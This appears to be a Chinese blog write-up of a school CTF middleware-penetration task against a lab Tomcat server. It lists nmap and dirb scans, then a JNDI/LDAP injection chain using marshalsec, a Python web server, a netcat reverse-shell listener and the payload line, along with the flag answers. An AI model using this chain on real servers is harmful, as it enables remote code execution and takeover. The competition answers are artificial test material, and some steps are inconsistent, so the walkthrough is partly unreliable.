B-10:中间件渗透测试

最新推荐文章于 2024-04-26 13:53:30 发布
最新推荐文章于 2024-04-26 13:53:30 发布
阅读量502 收藏 2
点赞数
分类专栏: # 2022年宁波市中职组“网络安全”赛项 文章标签: 中间件 服务器 负载均衡
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_45155797/article/details/130121691
版权

Server2131

B-10:中间件渗透测试 
任务环境说明:
	服务器场景:Server2131(关闭链接)
	服务器场景操作系统:Linux
Flag值格式:Flag{Xxxx123},括号中的内容作为 Flag值,提交 Xxxx123 即可
1.通过渗透测试平台Kali对靶机场景Server2131进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为Flag值提交;
2.通过渗透测试平台Kali对靶机场景Server2131进行系统服务及版本扫描渗透测试,并将该操作显示结果中Apache Tomcat中间件服务对应的服务版本号作为Flag值提交(如:3.6.78);
3.通过渗透测试平台Kali对靶机场景Server2131进行网站目录枚举渗透测试,使用工具dirb的默认字典来进行枚举,将dirb工具返回结果中的扫描到的目录数量作为Flag值提交;  
4.通过渗透测试平台Kalie对靶机场景Serve21r31进行网站目录枚举渗透测试,使用工具dirb的默认字典来进行枚举,将dirb工具返回结果中的最后一行的URL作为Flag值提交;(注:IP地址使用172.16.1.1代替)
5.通过渗透测试平台Kali对靶机场景Server2131进行渗透测试,将该场景tomcat网站渗透成功后回显的关键提示信息作为Flag值提交; 
6.通过渗透测试平台Kali对靶机场景Server2131进行渗透测试,将该场景tomcat网站根路径下唯一一个后缀为.png文件的文件内容作为Flag值提交; 
7.通过渗透测试平台Kali对靶机场景Server2131进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件中的Flag1作为Flag值提交。

1.通过渗透测试平台Kali对靶机场景Server2131进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为Flag值提交;

nmap -O 192.168.14.169


Flag:Linux 3.2 - 4.9

2.通过渗透测试平台Kali对靶机场景Server2131进行系统服务及版本扫描渗透测试,并将该操作显示结果中Apache Tomcat中间件服务对应的服务版本号作为Flag值提交(如:3.6.78);

nmap -sV 192.168.14.169


Flag:8.5.45

3.通过渗透测试平台Kali对靶机场景Server2131进行网站目录枚举渗透测试,使用工具dirb的默认字典来进行枚举,将dirb工具返回结果中的扫描到的目录数量作为Flag值提交;

dirb http://192.168.14.169:8080


Flag:6

4.通过渗透测试平台Kalie对靶机场景Server2131进行网站目录枚举渗透测试,使用工具dirb的默认字典来进行枚举,将dirb工具返回结果中的最后一行的URL作为Flag值提交;(注:IP地址使用172.16.1.1代替)

Flag:http://192.168.14.169:8080/manager

5.通过渗透测试平台Kali对靶机场景Server2131进行渗透测试,将该场景tomcat网站渗透成功后回显的关键提示信息作为Flag值提交;

进入到路径/root/PoCs 目录下,使用命令 vim Bash.html 编辑该文件,将IP地址修改为当前主机的ip地址 (注意是回连会话连接到的主机,也就是 kali渗透机)


接下来修改文件,将Exploit.java 文件的 ip 地址,修改为 kali 的ip 地址。


最后使用命令 javac Exploit.java 来创建 Exploit.class 实例


必须切换至/root/PoCs 目录下,使用命令 python -mSimpleHTTPServer 1234 ,该命令用于快速的搭建一个 web 服务器,并将当前目录 (PoCs)下的内容共享出去。后面需要用到 Bash.html 文件反弹shell。 (这里的端口必须跟 Exploit.iava 文件中的端口一致。默认为1234,不用做修改)


切换路径至/root/PoCs/marshalsec/target 目录下,使用工具 marshalsec 来启动一个LDAP 服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.14.164:1234/#Exploit 8899


使用命令: nc-lvp 4444 建立监听 shell。这里的 4444 端口,来源于Bash.html文件内容的端口。


前面探测出来的网络路径中存在路径 webstudy



c=${jndi:ldap://192.168.14.160:8899/id}


Flag:Flag{y8kkRFkr}

6.通过渗透测试平台Kali对靶机场景Server2131进行渗透测试,将该场景tomcat网站根路径下唯一一个后缀为.png文件的文件内容作为Flag值提交;

ps -ef | grep "tomcat"
ls /home/apache-tomcat-8.5.45/webapps/webstudy




Flag:E4BhheeC

7.通过渗透测试平台Kali对靶机场景Server2131进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件中的Flag1作为Flag值提交。

cat /root/flag.png


Flag:Flag1{J21c5buMk}

Wh1teSu
关注
专栏目录
web安全渗透测试十大常规项(一):web渗透测试之命令执行和代码执行
HACKONE的博客
06-16 79
-RCE代码执行:引用脚本代码解析执行 -RCE命令执行:脚本调用操作系统命令 漏洞函数: 1.PHP: PHP代码执行函数: eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()、等 PHP命令执行函数: system()、exec()、shell_exec()、pcntl_exec()、popen()、proc
中间件渗透
jpygx123的博客
11-21 1433
Apache任意文件执行和文件解析漏洞: Tomcat远程代码执行:CVE-2017-12615 将 readonly参数设置为false时,即可通过PUT方式创建一个JSP文件,并可以执行任意代码。 文件名相关限制(如Windows文件名不能以空格结尾)来绕过限制返回201说明文件已经上传成功。(直接请求会被拦截) IIS文件解析漏洞: 漏洞利用: 文件解析漏洞一般用...
2023职网络安全B模块中间件渗透测试
FRANXX_02的博客
02-26 1032
通过本地PC渗透测试平台Kali对服务器场景Server2129进行系统服务及版本扫描渗透测试,并将该操作显示结果80端口对应服务状态信息作为Flag值提交;找到靶机Server2129桌面上111文件夹后缀为.docx的文件,将文档内容作为Flag值提交;找到靶机Server2129的C:\flag.txt文件,将文件的内容作为Flag值提交。找到靶机Server2129回收站内的文档,将文档内容作为Flag值提交;这个靶机的dns以及被我的虚拟机里的dhcp改了,所以这不是正确答案。
渗透测试-中间件解析漏洞分析
lza20001103的博客
04-27 4059
中间件解析漏洞分析
2024年网络安全山东省赛-SMB信息收集解析(职组)_使用访问工具对服务器服务访问,将服务器管理员桌面的文本文档里的内容作为 flag
最新发布
2401_84252281的博客
04-26 995
任务环境说明:服务器场景:Server1。
渗透测试中间件安全
Blood_Pupil的博客
05-21 4288
IIS 版本 漏洞 可利用度 利用场景 6.0 Put漏洞 (默认状态?) Webshell上传 1.0-10.0(全版本) 短文件名猜解 低 敏感文件下载,猜后台,猜敏感文件 6.0 远程代码执行(ms-16-016) 高 提权 PUT漏洞 短文件名猜解漏洞 漏洞形成原因 此漏洞实际是由HTTP请求旧DOS 8.3名称约定(SFN)的代字符(〜)波浪号引起的。 利...
网络安全之路:我的系统性渗透测试学习框架
03-19 1649
没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记找到答案么嘿嘿嘿嘿!!!) 注意:以下内容仅记录本人当时学习时任然不知的相关知识。笔记草率,可能有错,仅供参考。我会慢慢完善的哦! 写在前面: 1.业界比较好的信息安全网站: freebuff:这个看来你已经找到了 secWiKi:ennnnn 安全客:收集了各大SRC哦,如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug,赶快去提交吧,也可以去补天,漏洞盒子提交哦!还有众测平台哈哈哈。还有
渗透测试-文件上传
SK1ng的博客
09-25 709
文件上传 文件上传漏洞 服务器配置不当,导致任意文件上传 Web应用开启文件上传功能,但没有对文件进行足够的限制 危害 该漏洞可导致攻击者上传任意文件,包括恶意脚本、程序等。如果Web服务器所保存上传文件的可写目录具有执行权限,则可以上传后门文件getshell 条件 Web服务器开启上传功能,且接口对外开放 Web用户对目标目录具有可写权限,甚至执行权限 Web中间件可以解析上传的脚本 验证/绕过 前端验证 JS类防护 如: <script type="text/javascript"&g
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9442
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题含有关键词的网页 intext:KEYWORD //搜索站
安全测--WEB,微信端渗透测试报告
Qton_CSDN的博客
02-27 4035
流程: 1.先用wvs扫 2.暴力破解 3.稍微看下请求包有什么不妥的地方没有,比如明文传输,cookie放太多个人信息,等等 4.一边看wvs结果可以一边找sql注入点,比如查询的地方 5.一边看wvs一边看xss的注入点,比如存储数据的地方 6.找文件上传的地方,尝绕过,传马 7.有短信/邮箱服务一下炸弹 8.扫一下开启的端口,看看有没有开启不安全的服务等等 。。。差不多这样吧 都...
视频教程-ctf之图片隐写-其他
weixin_30808241的博客
05-28 450
ctf之图片隐写 曾在启明星辰、绿盟科技等大型企业安全公司就职,对金融、能源...
2023年网络安全比赛--中间件渗透测试职组(超详细)
Aluxian_的博客
01-25 5423
4.通过渗透测试平台Kalie对靶机场景Server2131进行网站目录枚举渗透测试,使用工具dirb的默认字典来进行枚举,将dirb工具返回结果的最后一行的URL作为Flag值提交;(注:IP地址使用172.16.1.1代替)3.通过渗透测试平台Kali对靶机场景Server2131进行网站目录枚举渗透测试,使用工具dirb的默认字典来进行枚举,将dirb工具返回结果的扫描到的目录数量作为Flag值提交;
职网络安全技能竞赛——广西区赛中间件渗透测试教程文章
旺仔Sec&blog
07-04 474
2022年职组广西自治区网络安全技能竞赛之中间件渗透测试
渗透测试-WEB安全梳理-中间件apache、IIS、tomcat、weblogic、websphere、jboos、nginx)
lza20001103的博客
08-18 4724
渗透测试-WEB安全梳理-中间件apache、IIS、tomcat、weblogic、websphere、jboos、nginx) WEB安全梳理-中间件apache、IIS、tomcat、weblogic、websphere、jboos、nginx) m0be1 Hacking黑白红 2022-06-13 23:47 发表于安徽 文章目录渗透测试-WEB安全梳理-中间件apache、IIS、tomcat、weblogic、websphere、jboos、nginx)目录中间件Apache一、Apac
渗透测试中间件解析漏
weixin_45380284的博客
03-06 708
中间件解析漏 (一)IIS5.x-6.x解析漏洞 使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,而不能解析aspx文件。 目录解析(6.0) 形式:www.xxx.com/xx.asp/xx.jpg 原理: 服务器默认会把.asp,.asa目录下的文件都解析成asp文件。 文件解析 形式:www.xxx.com/xx.asp;.jpg 原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg便被
渗透测试—常见端口
wilson_xpp的博客
03-24 3066
渗透测试之常见端口 在渗透测试过程大多数渗透测试工程师会对目标系统进行端口信息收集,端口信息收集一般有如下几种方式: 端口banner信息 常用服务默认端口 端口列表以及利用方式 端口 端口服务/协议简要说明 渗透用途 tcp 20,21 ftp 默认的数据和命令传输端口[可明文亦可加密传输] 允许匿名的上传下载,爆破,嗅探,win提权,远...
2023年网络安全比赛--Web渗透测试国赛篇(超详细)
Aluxian_的博客
06-29 2550
2023网络安全解析 国赛篇2380
网安赛题整理
武恩赐
02-13 1228
网安赛题整理
rocketmq
never_break_heart的博客
07-24 304
最近在迁移项目的时候,顺带研究了一下rocketmq这个支持消息持久化的队列模型的消息中间件,之前也接触过一些像activemq,rabbitmq等中间件,但没有深入了解。 1. 什么是消息中间件 它采用高效可靠的传递机制进行平台无关的数据传递,通常消息队列利用异步的方式与服务端进行交互,适用于实时性不太高的场景。一般是一个队列模型的消息中间件,其主要解决异步解耦,挡住前端的数据洪
理解koa-compose:解析中间件处理模块
"对koa-compose中间件处理模块的简单解析" Koa-compose是Koa框架用于组合中间件的关键模块,它的主要任务是管理和协调多个中间件的执行顺序,确保每个中间件按照预设的顺序正确地执行。在Koa中间件是一个具有...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值